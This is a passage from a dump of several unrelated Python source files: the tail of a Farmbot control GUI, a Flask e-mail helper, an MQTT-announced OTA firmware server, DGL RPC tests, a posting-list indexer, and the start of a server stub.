% tmpPath) ''' cmd_file = open(self.scriptPath, "r") lines = cmd_file.readlines() for line in lines: cmd = line.strip() if len(cmd)>0: self.txtbox_script.insert(END, cmd+'\n') cmd_file.close() ''' def btn_savescript_click(self): tmpPath= self.entry_scriptPath.get() self.txtbox_script.exportfile(tmpPath) def btn_runscript_click(self): if self.ArdMntr.connect: if self.StartRunScript_judge: #=================================== # Delete Scanning Thread #=================================== self.StartRunScript_judge= False del(self.thread_runningScript) ''' self.tabbox.tab(self.tab_control, state='normal') self.tabbox.tab(self.tab_imageprocess, state='normal') self.Lock_tabloadscript(False) self.btn_runscript.config(text= 'RUN', fg='white', activeforeground= 'white', bg= self.bgGreen,activebackground= self.bgGreen_active) self.StartRunScript_judge= False ''' else: ''' content= self.txtbox_script.get("1.0", "end-1c") test= self.txtbox_script.getvalue() print 'type test:', type(test) with open('tmp.txt', "w") as out: out.write(content) ''' self.txtbox_script.exportfile("tmp.txt") #================================= # New Thread of Scanning process #================================ self.thread_runningScript= threading.Thread(target= self.runningScript_run) self.thread_runningScript.start() self.tabbox.tab(self.tab_control, state='disable') self.tabbox.tab(self.tab_imageprocess, state='disable') self.Lock_tabloadscript(True) self.btn_runscript.config(text= 'STOP', fg='white', activeforeground= 'white', bg= self.bgRed,activebackground= self.bgRed_active) self.StartRunScript_judge= True else: tkMessageBox.showerror("Error", "Arduino connection refused!") def btn_StartScan_click(self): self.imageProcessor.set_threshold_size(int(self.scale_threshold_MinSize.get())) self.imageProcessor.set_threshold_graylevel(int(self.scale_threshold_graylevel.get())) self.input_Zpos= int(self.entry_Zpos.get()) self.readmergeframeIndex= gui_vars.scanIndex print 'Start' if self.StartScan_judge: 
#=================================== # Delete Scanning Thread #=================================== self.StartScan_judge= False del(self.thread_scanning) ''' self.Lock_tabcontrol(False) self.Lock_Menubar(False) self.tabbox.tab(self.tab_loadscript, state='normal') self.tabbox.tab(self.tab_imageprocess, state='normal') self.btn_StartScan.config(text= 'Start Scan', fg='white', activeforeground= 'white', bg= self.bgGreen,activebackground= self.bgGreen_active) ''' else: if self.ArdMntr.connect: try: self.reset_mergeframe() self.scan_X= [int(self.entry_1stXpos.get()), int(self.entry_ScanInterval_X.get()), int(self.entry_ScanAmount_X.get())] self.scan_Y= [int(self.entry_1stYpos.get()), int(self.entry_ScanInterval_Y.get()), int(self.entry_ScanAmount_Y.get())] self.set_mergeframe_size(self.scan_X[2], self.scan_Y[2]) self.reset_mergeframe() #print '### ', self.scan_X, self.scan_Y self.ArdMntr.move_Coord(self.scan_X[0], self.scan_Y[0], self.input_Zpos) if self.scan_X[0]+self.scan_X[1]*self.scan_X[2]<self.limit[0] | self.scan_Y[0]+self.scan_Y[1]*self.scan_Y[2]<self.limit[1]: self.StartScan_judge= True #self.saveTimeIndex= datetime.now().strftime("%Y%m%d%H%M%S") self.saveTimeIndex= datetime.now().strftime('%Y%m%d%H%M%S') #================================= # New Thread of Scanning process #================================ self.thread_scanning= threading.Thread(target= self.scanning_run) self.thread_scanning.start() print '*** scanning...' 
self.Lock_tabcontrol(True) self.Lock_Menubar(True) self.tabbox.tab(self.tab_loadscript, state='disable') self.tabbox.tab(self.tab_imageprocess, state='disable') self.btn_StartScan.config(text= 'STOP Scan', fg='white', activeforeground= 'white', bg= self.bgRed, activebackground= self.bgRed_active) else: tkMessageBox.showerror("Error", "The scanning of X should be in [0~{0}]\nThe range of Y should be in [0~{1}]".format(self.limit[0],self.limit[1])) except: tkMessageBox.showerror('Error', 'Please enter nubmer') else: tkMessageBox.showerror("Error", "Arduino connection refused!") def btn_saveImg_click(self): #self.saveImg= True self.imagename= 'Frame1' self.singleframe = self.CamMntr.get_frame() self.saveImg_function(self.singleframe, gui_vars.savePath, self.imagename) self.display_panel_singleframe(self.singleframe) def btn_loadImg_click(self): str_imagePath = tkFileDialog.askopenfilename(title = "Select image",filetypes = (("jpeg files","*.jpg"), ("png files","*.png"), ("tif files","*.tif"),("all files","*.*"))) print '>>>> ', str_imagePath if str_imagePath !="": img= utils_tool.readImage(str_imagePath) if img is not False: self.singleframe= img.copy() self.display_panel_singleframe(self.singleframe) else: tkMessageBox.showerror('Image does not exist', 'The image\n{0}\n does not exist. Please check the path again') def btn_MoveTo_click(self): if self.ArdMntr.connect: try: Target_X= int(self.entry_Xpos.get()) Target_Y= int(self.entry_Ypos.get()) Target_Z= int(self.entry_Zpos.get()) if (Target_X>=0) & (Target_X<=self.limit[0]) & (Target_Y>=0) & (Target_Y<=self.limit[1]): cmd= 'G00 X{0} Y{1} Z{2}'.format(Target_X, Target_Y, Target_Z) #self.ArdMntr.serial_send(cmd) print 'ArdMntr.move_Coord...' 
self.ArdMntr.move_Coord(Target_X, Target_Y, Target_Z) print 'Command: ',cmd time.sleep(1) else: tkMessageBox.showerror("Error", "The range of X should be in [0~{0}]\nThe range of Y should be in [0~{1}]".format(self.limit[0],self.limit[1])) except: tkMessageBox.showerror("Error", "Please enter number!") else: tkMessageBox.showerror("Error", "Arduino connection refused!") def mark_cross_line(self , frame): w = frame.shape[0] / 2 h = frame.shape[1] / 2 cv2.line(frame , (h - 15 , w) , (h + 15 , w) , (255 , 0 , 0) , 1) cv2.line(frame , (h , w - 15) , (h , w + 15) , (255 , 0 , 0) , 1) return frame def saveImg_function(self, arg_frame,arg_savePath, arg_filename): utils_tool.check_path(arg_savePath) # make sure output dir exists #if(not path.isdir(arg_savePath)): # makedirs(arg_savePath) #tmp= cv2.cvtColor(arg_frame, cv2.COLOR_RGB2BGR) cv2.imwrite(arg_savePath+arg_filename+'.jpg',arg_frame) def runningScript_run(self): cmd_file = open('tmp.txt', "r") lines = cmd_file.readlines() for line in lines: cols = line.split("#") print '***', self.StartRunScript_judge,line print("line=%s,cols_count=%i" %(line,len(cols))) if len(cols)>=1: cmd = cols[0] cmd = cmd.strip() if len(cmd)>0: print(">> "+cmd) cmd_code= cmd.strip().split(' ')[0].replace(' ','') if cmd_code[0]== 'C': if cmd_code[1:]== '00': TimeIndex= datetime.now().strftime('%Y%m%d%H%M%S') tmp_x, tmp_y, tmp_z= self.ArdMntr.get_CurPosition() imgName= '{0}_{1}_{2}_{3}'.format(TimeIndex, tmp_x, tmp_y, tmp_z) self.singleframe= self.CamMntr.get_frame() self.saveImg_function(self.singleframe, gui_vars.savePath, imgName) self.display_panel_singleframe(self.singleframe) else: while 1: if self.ArdMntr.cmd_state.is_ready(): #wait system ready to accept commands self.ArdMntr.serial_send("%s" %cmd) time.sleep(1) break else: time.sleep(1) time.sleep(1) if self.StartRunScript_judge== False: break cmd_file.close() print 'CLOSE FILE...' 
self.tabbox.tab(self.tab_control, state='normal') self.tabbox.tab(self.tab_imageprocess, state='normal') self.Lock_tabloadscript(False) self.btn_runscript.config(text= 'RUN', fg='white', activeforeground= 'white', bg= self.bgGreen,activebackground= self.bgGreen_active) self.StartRunScript_judge= False def scanning_run(self): step=0 #while self.scanning_judge: if self.StartScan_judge: print '>>> Scanning...' for step_X in range(0, self.scan_X[2]): for step_Y in range(0, self.scan_Y[2]): if self.StartScan_judge== False: break if step_X % 2 ==0: tmp_step_Y= step_Y else: tmp_step_Y= self.scan_Y[2]- step_Y-1 tmp_X, tmp_Y= self.scan_X[0]+ step_X*self.scan_X[1], self.scan_Y[0]+ tmp_step_Y*self.scan_Y[1] #tmp_X, tmp_Y= self.scan_X[0]+ step_X*self.scan_X[1], self.scan_Y[0]+ step_Y*self.scan_Y[1] print '>> X, Y: ', tmp_X, ', ', tmp_Y #self.saveScanning= 'Raw_{0}_{1}.png'.format(self.scan_X[0]+ step_X*self.scan_X[1], self.scan_Y[0]+ step_Y*self.scan_Y[1]) self.ArdMntr.move_Coord(tmp_X, tmp_Y, self.input_Zpos) time.sleep(1) while 1: if (self.ArdMntr.cmd_state.is_ready()): time.sleep(0.5) #self.saveScanning= '{0}_'.format(step)+self.ArdMntr.cmd_state.strCurX+'_'+self.ArdMntr.cmd_state.strCurY #self.saveScanning= self.ArdMntr.cmd_state.strCurX+'_'+self.ArdMntr.cmd_state.strCurY self.saveScanning= '{0}_{1}'.format(tmp_X, tmp_Y) frame= self.CamMntr.get_frame() self.saveImg_function(frame, gui_vars.saveScanningPath,self.readmergeframeIndex+'_'+self.saveTimeIndex+'_'+self.saveScanning) result= frame.copy() self.display_panel_singleframe(result) #self.display_panel_mergeframe(result, step_X, step_Y) #self.display_panel_mergeframe(result, step_Y, step_X) #self.display_panel_mergeframe(result, tmp_step_Y, step_X) self.display_panel_mergeframe(result, tmp_step_Y, self.scan_X[2] - 1 - step_X) #2018.02.12 #print '>> display_panel X, Y: ', tmp_step_Y, ', ', self.scan_X[2] - 1 - step_X #2018.02.12 print self.saveScanning #time.sleep(2) break else: time.sleep(1) if self.StartScan_judge== 
False: break step= step+1 self.StartScan_judge= False self.Lock_tabcontrol(False) self.Lock_Menubar(False) self.tabbox.tab(self.tab_loadscript, state='normal') self.tabbox.tab(self.tab_imageprocess, state='normal') self.btn_StartScan.config(text= 'Start Scan', fg='white', activeforeground='white', bg= self.bgGreen, activebackground= self.bgGreen_active) else: time.sleep(0.2) step=0 def check_frame_update(self): result = Image.fromarray(self.frame) result = ImageTk.PhotoImage(result) self.panel.configure(image = result) self.panel.image = result self.panel.after(8, self.check_frame_update) def main_run(self): frame= self.CamMntr.get_frame() if frame is not -1: frame= cv2.cvtColor(frame, cv2.COLOR_BGR2RGB) frame = self.mark_cross_line(frame) frame= cv2.resize(frame,(self.frame_width,self.frame_height),interpolation=cv2.INTER_LINEAR) text='Arduino Connection Refused ...' text_water='' text_seed='' text_light='' #2018.02.12 color= (0,0,0) if self.ArdMntr.connect== True: if self.StartScan_judge == False: if self.ArdMntr.cmd_state.is_ready() : text= 'Idling ...' color = (0 , 255 , 0) else: text= 'Moving ...' color = (255,0,0) else: if self.ArdMntr.cmd_state.is_ready(): text= 'Processing...' color = (0 , 255 , 0) else: text= 'Scanning...'+'(X, Y)= ('+self.ArdMntr.cmd_state.strCurX+', '+self.ArdMntr.cmd_state.strCurY+')' color = (255,0,0) if self.ArdMntr.WaterOn: text_water= 'Water: On ' cv2.putText(frame, text_water,(10,70),cv2.FONT_HERSHEY_SIMPLEX, 0.7,(255,0,0),1) if self.ArdMntr.SeedOn: text_seed= 'Vaccum: On ' cv2.putText(frame, text_seed,(10,100),cv2.FONT_HERSHEY_SIMPLEX, 0.7,(255,0,0),1) cv2.putText(frame, text,(10,40),cv2.FONT_HERSHEY_SIMPLEX, 0.7,color,1) self.strStatus= text+ ' ; '+ text_water+ text_seed self.set_frame(frame) time.sleep(0.01) root = Tkinter.Tk() root.title("[FBTUG] offline Farmbot GUI for development") root.attributes('-zoomed', True) # FullScreen #root.attributes('-fullscreen', True) #-2018.02.20 app= App(root) root.mainloop()
email.py
# -*- coding: utf-8 -*-
# @Author: chiranjeevi E
# @File Name: sendmail.py
"""Asynchronous e-mail delivery helpers for a Flask application."""
from threading import Thread

from flask import current_app, render_template
from flask_mail import Mail, Message


def send_async_email(app, msg):
    """Send *msg* from a worker thread, inside *app*'s application context.

    :param app: the real Flask application object (not the proxy).
    :param msg: a prepared ``flask_mail.Message``.
    """
    with app.app_context():
        # Mail(app) already calls init_app(app) internally, so the extra
        # explicit mail.init_app(app) the original code did was redundant
        # (it initialised the extension twice).
        mail = Mail(app)
        mail.send(msg)


def send_email(to, subject, template, **kwargs):
    """Render *template* (``.txt`` and ``.html`` variants) and e-mail it.

    :param to: recipient address.
    :param subject: subject line, prefixed with ``FLASKY_MAIL_SUBJECT_PREFIX``.
    :param template: template base name; ``.txt``/``.html`` are appended.
    :param kwargs: template context passed to ``render_template``.
    :returns: the started ``Thread`` so callers (e.g. tests) can ``join()`` it.

    The message is sent on a background thread so the request handler is not
    blocked by SMTP I/O.
    """
    # current_app is a thread-local proxy and cannot cross thread boundaries;
    # grab the underlying application object for the worker thread.
    app = current_app._get_current_object()
    msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
                  sender=app.config['FLASKY_MAIL_SENDER'],
                  recipients=[to], charset="utf8")
    msg.body = render_template(template + '.txt', **kwargs)
    msg.html = render_template(template + '.html', **kwargs)
    thr = Thread(target=send_async_email, args=[app, msg])
    thr.start()
    return thr
ota.py
#!/usr/bin/env python
"""Serve a firmware/config file over HTTP for OTA upgrades, announced via MQTT.

The HTTP server shuts itself down automatically once no client has connected
for TIMEOUT seconds.
"""
try:
    # Python 3
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from socketserver import ThreadingMixIn
except ImportError:
    # Python 2 fallback
    from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
    from SocketServer import ThreadingMixIn
import argparse
import json
import os
import paho.mqtt.client as mqtt
import shutil
from threading import Thread, Lock
import time
import socket
import sys

# Seconds of inactivity after which the server shuts down.
TIMEOUT = 3

# Shared between the handler threads (ThreadingMixIn) and the timeout thread.
# The original code mutated these without synchronisation; all access now
# goes through _state_lock.
_state_lock = Lock()
active_connections = 0
last_request_time = time.time()


class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
    """HTTP server that handles each request in its own thread."""
    pass


def OTAServerFactory(args):
    """Build a request-handler class closed over the parsed CLI *args*.

    :param args: argparse namespace with ``file``, ``version`` attributes.
    :returns: a ``BaseHTTPRequestHandler`` subclass serving the upgrade file.
    """

    class OTAServer(BaseHTTPRequestHandler, object):

        def log_message(self, format, *log_args):
            # Silence the default per-request stderr logging; we print our own.
            return

        def do_GET(self):
            global active_connections
            global last_request_time
            with _state_lock:
                active_connections += 1
                last_request_time = time.time()
            # try/finally guarantees the connection counter is decremented
            # even if the client disconnects mid-transfer; the original code
            # leaked the counter on error, keeping the server alive forever.
            try:
                print('%s - (%s: %s) GET %s ' % (
                    self.log_date_time_string(), self.address_string(),
                    self.headers.get('User-Agent', ''), self.path))
                # ETag match: the client already runs this version.
                if self.headers.get('If-None-Match', '').replace('"', '') \
                        == args.version:
                    self.send_response(304)
                    # end_headers() was missing in the original code, so the
                    # 304 response was never terminated properly.
                    self.end_headers()
                    print('%s - (%s: %s) Done: 304 Not Modified' % (
                        self.log_date_time_string(), self.address_string(),
                        self.headers.get('User-Agent', '')))
                    return
                self.send_response(200)
                self.send_header('Content-Length', os.stat(args.file).st_size)
                self.send_header('ETag', args.version)
                self.end_headers()
                with open(args.file, 'rb') as f:
                    shutil.copyfileobj(f, self.wfile)
                print('%s - (%s: %s) Done: 200 OK' % (
                    self.log_date_time_string(), self.address_string(),
                    self.headers.get('User-Agent', '')))
            finally:
                with _state_lock:
                    active_connections -= 1

    return OTAServer


def timeout_thread(httpd):
    """Shut *httpd* down once it has been idle for TIMEOUT seconds."""
    while True:
        with _state_lock:
            idle = (active_connections == 0 and
                    time.time() >= last_request_time + TIMEOUT)
        if idle:
            break
        time.sleep(0.1)
    httpd.shutdown()


def get_local_ip():
    """Return the local IP address used to reach the internet.

    Connecting a UDP socket only selects the outgoing interface; no traffic
    is actually sent to 8.8.8.8.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        s.connect(("8.8.8.8", 80))
        return s.getsockname()[0]
    finally:
        s.close()


def on_mqtt_connect(client, args, flags, rc):
    """MQTT ``on_connect`` callback: announce the upgrade URL, then disconnect.

    *args* is the parsed CLI namespace, delivered by paho as ``userdata``.
    """
    client.publish('%s/OTA/%s' % (args.target, args.name),
                   'http://%s:%d/' % (get_local_ip(), args.port))
    client.disconnect()


def main():
    """Parse CLI arguments, announce the upgrade over MQTT, serve the file."""
    parser = argparse.ArgumentParser(description='OTA firmware/config upgrade')
    parser.add_argument('-f', '--file', required=True,
                        help='File used for upgrade')
    parser.add_argument('-v', '--version', required=True,
                        help='Version of the upgrade file')
    parser.add_argument('-n', '--name', required=True,
                        help='The name of image type to publish, e.g. '
                             '"Firmware", "Config", etc.')
    parser.add_argument('-t', '--target', default='BLE2MQTT',
                        help='Host to upgrade. If left empty, will upgrade '
                             'all hosts')
    parser.add_argument('-p', '--port', type=int, default=8000,
                        help='HTTP server port')
    parser.add_argument('--mqtt-broker-server',
                        help='MQTT broker server for initiating upgrade '
                             'procedure. Default taken from configuration '
                             'file')
    parser.add_argument('--mqtt-broker-port', type=int,
                        help='MQTT broker port for initiating upgrade '
                             'procedure. Default taken from configuration '
                             'file')
    args = parser.parse_args()

    # Fall back to the broker settings from the device configuration file.
    with open('data/config.json') as config_file:
        config = json.load(config_file)
    if args.mqtt_broker_server is None:
        args.mqtt_broker_server = config['mqtt']['server']['host']
    if args.mqtt_broker_port is None:
        args.mqtt_broker_port = config['mqtt']['server']['port']

    # Connect to MQTT; the on_connect callback publishes the URL and
    # disconnects immediately.
    mqttc = mqtt.Client(userdata=args)
    mqttc.on_connect = on_mqtt_connect
    mqttc.connect(args.mqtt_broker_server, args.mqtt_broker_port)
    mqttc.loop_start()

    # Set up HTTP server; timeout_thread stops it once clients go quiet.
    httpd = ThreadedHTTPServer(("", args.port), OTAServerFactory(args))
    Thread(target=timeout_thread, args=(httpd, )).start()
    print('Listening on port %d' % args.port)
    httpd.serve_forever()
    httpd.server_close()
    print('No new connection requests, shutting down')


if __name__ == '__main__':
    main()
test_rpc.py
import os
import time
import socket

import dgl
import backend as F
import unittest, pytest
import multiprocessing as mp
from numpy.testing import assert_array_equal

from utils import reset_envs, generate_ip_config

if os.name != 'nt':
    import fcntl
    import struct

# Fixed payloads echoed through the RPC layer by every test below.
INTEGER = 2
STR = 'hello world!'
HELLO_SERVICE_ID = 901231
TENSOR = F.zeros((1000, 1000), F.int64, F.cpu())


def foo(x, y):
    """Sanity check that function objects survive (de)serialization."""
    assert x == 123
    assert y == "abc"


class MyRequest(dgl.distributed.Request):
    """Request carrying mixed payload types (int, str, tensor, function)."""
    def __init__(self):
        self.x = 123
        self.y = "abc"
        self.z = F.randn((3, 4))
        self.foo = foo

    def __getstate__(self):
        return self.x, self.y, self.z, self.foo

    def __setstate__(self, state):
        self.x, self.y, self.z, self.foo = state

    def process_request(self, server_state):
        pass


class MyResponse(dgl.distributed.Response):
    def __init__(self):
        self.x = 432

    def __getstate__(self):
        return self.x

    def __setstate__(self, state):
        self.x = state


def simple_func(tensor):
    """Identity function shipped inside HelloRequest."""
    return tensor


class HelloResponse(dgl.distributed.Response):
    def __init__(self, hello_str, integer, tensor):
        self.hello_str = hello_str
        self.integer = integer
        self.tensor = tensor

    def __getstate__(self):
        return self.hello_str, self.integer, self.tensor

    def __setstate__(self, state):
        self.hello_str, self.integer, self.tensor = state


class HelloRequest(dgl.distributed.Request):
    def __init__(self, hello_str, integer, tensor, func):
        self.hello_str = hello_str
        self.integer = integer
        self.tensor = tensor
        self.func = func

    def __getstate__(self):
        return self.hello_str, self.integer, self.tensor, self.func

    def __setstate__(self, state):
        self.hello_str, self.integer, self.tensor, self.func = state

    def process_request(self, server_state):
        # Verify the payload round-tripped intact, then echo it back.
        assert self.hello_str == STR
        assert self.integer == INTEGER
        new_tensor = self.func(self.tensor)
        res = HelloResponse(self.hello_str, self.integer, new_tensor)
        return res


def start_server(num_clients, ip_config, server_id=0, keep_alive=False,
                 num_servers=1, net_type='tensorpipe'):
    """Run an RPC server process serving the hello service."""
    print("Sleep 1 seconds to test client re-connect.")
    time.sleep(1)
    server_state = dgl.distributed.ServerState(
        None, local_g=None, partition_book=None, keep_alive=keep_alive)
    dgl.distributed.register_service(
        HELLO_SERVICE_ID, HelloRequest, HelloResponse)
    print("Start server {}".format(server_id))
    dgl.distributed.start_server(server_id=server_id,
                                 ip_config=ip_config,
                                 num_servers=num_servers,
                                 num_clients=num_clients,
                                 server_state=server_state,
                                 net_type=net_type)


def start_client(ip_config, group_id=0, num_servers=1, net_type='tensorpipe'):
    """Connect to server 0 and exercise every RPC entry point."""
    dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest,
                                     HelloResponse)
    dgl.distributed.connect_to_server(
        ip_config=ip_config, num_servers=num_servers, group_id=group_id,
        net_type=net_type)
    req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
    # test send and recv
    dgl.distributed.send_request(0, req)
    res = dgl.distributed.recv_response()
    assert res.hello_str == STR
    assert res.integer == INTEGER
    assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
    # test remote_call
    target_and_requests = []
    for i in range(10):
        target_and_requests.append((0, req))
    res_list = dgl.distributed.remote_call(target_and_requests)
    for res in res_list:
        assert res.hello_str == STR
        assert res.integer == INTEGER
        assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
    # test send_request_to_machine
    dgl.distributed.send_request_to_machine(0, req)
    res = dgl.distributed.recv_response()
    assert res.hello_str == STR
    assert res.integer == INTEGER
    assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))
    # test remote_call_to_machine
    target_and_requests = []
    for i in range(10):
        target_and_requests.append((0, req))
    res_list = dgl.distributed.remote_call_to_machine(target_and_requests)
    for res in res_list:
        assert res.hello_str == STR
        assert res.integer == INTEGER
        assert_array_equal(F.asnumpy(res.tensor), F.asnumpy(TENSOR))


def test_serialize():
    """Round-trip a request/response through (de)serialize payload."""
    reset_envs()
    os.environ['DGL_DIST_MODE'] = 'distributed'
    from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload
    SERVICE_ID = 12345
    dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
    req = MyRequest()
    data, tensors = serialize_to_payload(req)
    req1 = deserialize_from_payload(MyRequest, data, tensors)
    req1.foo(req1.x, req1.y)
    assert req.x == req1.x
    assert req.y == req1.y
    assert F.array_equal(req.z, req1.z)

    res = MyResponse()
    data, tensors = serialize_to_payload(res)
    res1 = deserialize_from_payload(MyResponse, data, tensors)
    assert res.x == res1.x


def test_rpc_msg():
    """Check RPCMessage field plumbing for a serialized request."""
    reset_envs()
    os.environ['DGL_DIST_MODE'] = 'distributed'
    from dgl.distributed.rpc import serialize_to_payload, deserialize_from_payload, RPCMessage
    SERVICE_ID = 32452
    dgl.distributed.register_service(SERVICE_ID, MyRequest, MyResponse)
    req = MyRequest()
    data, tensors = serialize_to_payload(req)
    rpcmsg = RPCMessage(SERVICE_ID, 23, 0, 1, data, tensors)
    assert rpcmsg.service_id == SERVICE_ID
    assert rpcmsg.msg_seq == 23
    assert rpcmsg.client_id == 0
    assert rpcmsg.server_id == 1
    assert len(rpcmsg.data) == len(data)
    assert len(rpcmsg.tensors) == 1
    assert F.array_equal(rpcmsg.tensors[0], req.z)


@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_rpc():
    """One server, one client, full request/response cycle."""
    reset_envs()
    os.environ['DGL_DIST_MODE'] = 'distributed'
    generate_ip_config("rpc_ip_config.txt", 1, 1)
    ctx = mp.get_context('spawn')
    pserver = ctx.Process(target=start_server, args=(1, "rpc_ip_config.txt"))
    pclient = ctx.Process(target=start_client, args=("rpc_ip_config.txt",))
    pserver.start()
    pclient.start()
    pserver.join()
    pclient.join()


@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
@pytest.mark.parametrize("net_type", ['socket', 'tensorpipe'])
def test_multi_client(net_type):
    """One server, many concurrent clients, both transports."""
    reset_envs()
    os.environ['DGL_DIST_MODE'] = 'distributed'
    ip_config = "rpc_ip_config_mul_client.txt"
    generate_ip_config(ip_config, 1, 1)
    ctx = mp.get_context('spawn')
    num_clients = 20
    pserver = ctx.Process(target=start_server,
                          args=(num_clients, ip_config, 0, False, 1, net_type))
    pclient_list = []
    for i in range(num_clients):
        pclient = ctx.Process(target=start_client,
                              args=(ip_config, 0, 1, net_type))
        pclient_list.append(pclient)
    pserver.start()
    for i in range(num_clients):
        pclient_list[i].start()
    for i in range(num_clients):
        pclient_list[i].join()
    pserver.join()


@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_multi_thread_rpc():
    """Send requests from the main thread and a sub-thread of one client."""
    reset_envs()
    os.environ['DGL_DIST_MODE'] = 'distributed'
    num_servers = 2
    generate_ip_config("rpc_ip_config_multithread.txt", num_servers, num_servers)
    ctx = mp.get_context('spawn')
    pserver_list = []
    for i in range(num_servers):
        pserver = ctx.Process(target=start_server,
                              args=(1, "rpc_ip_config_multithread.txt", i))
        pserver.start()
        pserver_list.append(pserver)

    def start_client_multithread(ip_config):
        import threading
        dgl.distributed.connect_to_server(ip_config=ip_config, num_servers=1)
        dgl.distributed.register_service(HELLO_SERVICE_ID, HelloRequest,
                                         HelloResponse)

        req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
        dgl.distributed.send_request(0, req)

        def subthread_call(server_id):
            req = HelloRequest(STR, INTEGER, TENSOR, simple_func)
            dgl.distributed.send_request(server_id, req)

        subthread = threading.Thread(target=subthread_call, args=(1,))
        subthread.start()
        subthread.join()

        res0 = dgl.distributed.recv_response()
        res1 = dgl.distributed.recv_response()
        # Order is not guaranteed
        assert_array_equal(F.asnumpy(res0.tensor), F.asnumpy(TENSOR))
        assert_array_equal(F.asnumpy(res1.tensor), F.asnumpy(TENSOR))
        dgl.distributed.exit_client()

    start_client_multithread("rpc_ip_config_multithread.txt")
    pserver.join()


@unittest.skipIf(os.name == 'nt', reason='Do not support windows yet')
def test_multi_client_groups():
    """Several client groups against keep-alive servers, then force shutdown."""
    reset_envs()
    os.environ['DGL_DIST_MODE'] = 'distributed'
    ip_config = "rpc_ip_config_mul_client_groups.txt"
    num_machines = 5
    # should test with larger number but due to possible port in-use issue.
    num_servers = 1
    generate_ip_config(ip_config, num_machines, num_servers)
    # pressure test
    num_clients = 2
    num_groups = 2
    ctx = mp.get_context('spawn')
    pserver_list = []
    for i in range(num_servers*num_machines):
        pserver = ctx.Process(target=start_server,
                              args=(num_clients, ip_config, i, True, num_servers))
        pserver.start()
        pserver_list.append(pserver)
    pclient_list = []
    for i in range(num_clients):
        for group_id in range(num_groups):
            pclient = ctx.Process(target=start_client,
                                  args=(ip_config, group_id, num_servers))
            pclient.start()
            pclient_list.append(pclient)
    for p in pclient_list:
        p.join()
    # Keep-alive servers must survive all clients disconnecting.
    for p in pserver_list:
        assert p.is_alive()
    # force shutdown server
    dgl.distributed.shutdown_servers(ip_config, num_servers)
    for p in pserver_list:
        p.join()


if __name__ == '__main__':
    test_serialize()
    test_rpc_msg()
    test_rpc()
    test_multi_client('socket')
    # Fix: was 'tesnsorpipe', an invalid net_type.
    test_multi_client('tensorpipe')
    test_multi_thread_rpc()
Postings.py
from keras.preprocessing.text import Tokenizer
import ujson
import os
import time
from tqdm import tqdm
import cProfile
import copy
import gc
from multiprocessing import Pool, Manager
from threading import Thread

gc.enable()

# Corpus locations; tokenized artifacts are cached next to the corpus.
dir = "/home/zjq/WSM/"
read_root = dir + "trials/"
write_root = dir + "postingss/"
words_path = dir + 'words.json'
logs_path = dir + 'logs.json'
if not os.path.exists(write_root):
    os.makedirs(write_root)
doc_num = len(os.listdir(read_root))
posting_list = dict()
letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',
           'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
           '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '\'', '_']

# split into 38 x 38 tiny posting lists
pre = []
for i in letters:
    for j in letters:
        pre.append(i + j)

start_time = time.time()
words, Logs = None, None
if os.path.exists(words_path):
    print("loading words ...")
    with open(words_path) as f:
        words = ujson.load(f)
if os.path.exists(logs_path):
    print("loading logs ...")
    with open(logs_path) as f:
        Logs = ujson.load(f)
if words is None or Logs is None:
    # No cache yet: tokenize the raw corpus and cache the results.
    file_name = read_root + "data.json"
    with open(file_name) as f:
        Logs = ujson.load(f)
    tokenizer = Tokenizer(filters='!"#$%&()*+,-./:;<=>?@[\\]^`{|}~\t\n')
    lenL = len(Logs)
    tokenizer.fit_on_texts(Logs)
    words = list(tokenizer.word_index.keys())
    Logs = tokenizer.texts_to_sequences(Logs)
    if not os.path.exists(words_path):
        with open(words_path, 'w+') as f:
            ujson.dump(words, f)
    if not os.path.exists(logs_path):
        with open(logs_path, 'w+') as f:
            ujson.dump(Logs, f)
print('Tokenizer costs time: ', time.time() - start_time)


# Fix: run_parallel() invokes pool.apply_async(f, (let, words_, Logs_)),
# but the old signature only accepted `let`, so every parallel task
# raised TypeError.  The extra parameters default to the module-level
# data, so the serial path f(let) keeps working unchanged.
def f(let, words=words, Logs=Logs):
    """Build and dump the 38 posting lists for words starting with `let`.

    posting_list[second-letter-index][word][doc-id] is the list of token
    positions of `word` within that document.
    """
    posting_list = [dict() for i in range(len(letters))]
    for i in tqdm(range(len(Logs))):
        for idx in range(len(Logs[i])):
            sti = str(i)
            # Keras word indices are 1-based, hence the -1.
            word = words[Logs[i][idx] - 1]
            if word[0] == let:
                secletter = 0
                if len(word) > 1 and word[1] in letters:
                    secletter = letters.index(word[1])
                if word not in posting_list[secletter]:
                    posting_list[secletter][word] = dict()
                if sti not in posting_list[secletter][word]:
                    posting_list[secletter][word][sti] = []
                posting_list[secletter][word][sti].append(idx)
    for j in range(len(posting_list)):
        with open(write_root + let + letters[j] + '.json', 'w+') as out:
            ujson.dump(posting_list[j], out)
    del posting_list


def run_parallel(words, Logs):
    """Process all first letters in parallel, sharing data via a Manager."""
    manager = Manager()
    words_ = manager.list(words)
    del words
    Logs_ = manager.list(Logs)
    del Logs
    with Pool(processes=len(letters)) as pool:
        pros = [pool.apply_async(f, (let, words_, Logs_)) for let in letters]
        [pro.get() for pro in pros]


if __name__ == '__main__':
    start_time = time.time()
    # run_parallel(words, Logs)
    for let in letters:
        f(let)
    print('Posting list processing costs time: ', time.time() - start_time)
Server.py
from multiprocessing import Process, Manager
import socket, logging
import typing


# This module is meant to be imported; running it directly does nothing.
def main():
    logging.error("Run run_server instead")


class Server():
